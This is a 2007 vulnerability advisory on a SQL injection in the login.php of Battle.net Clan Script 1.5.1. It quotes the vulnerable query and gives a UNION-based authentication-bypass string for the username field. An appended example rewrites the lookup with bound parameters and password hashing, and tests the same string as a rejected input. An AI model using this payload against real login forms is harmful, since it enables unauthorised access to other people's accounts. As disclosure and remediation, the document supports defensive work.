SECURITYVULNS:DOC:16674
Apr 11, 2007 - 12:00 a.m.

Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability

script : Battle.net Clan Script 1.5
file : login.php
attack : SQL injection

author : h a c k e r _ X


code :

line 9 –> $user = $_POST['user'];
line 10–> $pass = $_POST['pass'];



line 21–> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);



exploit :


Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : anything


thanks to : max007,simo64,brutalism and all Moroccan hackers

special thanks to "P Y N S S O"


milw0rm.com [2007-04-09]
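
Added example, not part of the advisory or of Battle.net Clan Script: a hardened form of the login.php lookup, where the user name is bound as a parameter and the password never enters the SQL text. Assumptions: the function name check_login, the sample account, a two-column model of bcs_members, password_hash() storage, and PDO with the pdo_sqlite driver standing in for the script's MySQL link.

```php
<?php
// Added example: hardened replacement for the login.php lookup quoted above.
// Assumptions: PDO with the pdo_sqlite driver stands in for the script's MySQL
// link; only the name and password columns of bcs_members are modelled, and the
// password column holds a password_hash() value instead of the original format.

function check_login(PDO $db, string $user, string $pass): bool
{
    // The user name is bound as data, so quotes, UNION and comment markers in
    // it cannot change the structure of the statement.
    $stmt = $db->prepare('SELECT password FROM bcs_members WHERE name = :name');
    $stmt->execute([':name' => $user]);
    $hash = $stmt->fetchColumn();

    // Compare in PHP against the stored hash; no matching row means no login.
    return is_string($hash) && password_verify($pass, $hash);
}

// Constructed sample data in an in-memory database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE bcs_members (name TEXT PRIMARY KEY, password TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO bcs_members (name, password) VALUES (?, ?)');
$ins->execute(['clanleader', password_hash('correct horse', PASSWORD_DEFAULT)]);

$cases = [
    ['clanleader', 'correct horse'],   // valid credentials
    ['clanleader', 'wrong'],           // wrong password
    // User name value quoted in the advisory, with an arbitrary password.
    ["' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*", 'anything'],
];
foreach ($cases as [$user, $pass]) {
    $result = check_login($db, $user, $pass) ? 'accepted' : 'rejected';
    printf("%-60s %s\n", $user, $result);
}
```

Because the bound value is compared only against the name column, the string from the advisory is looked up as a literal user name and matches no row.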
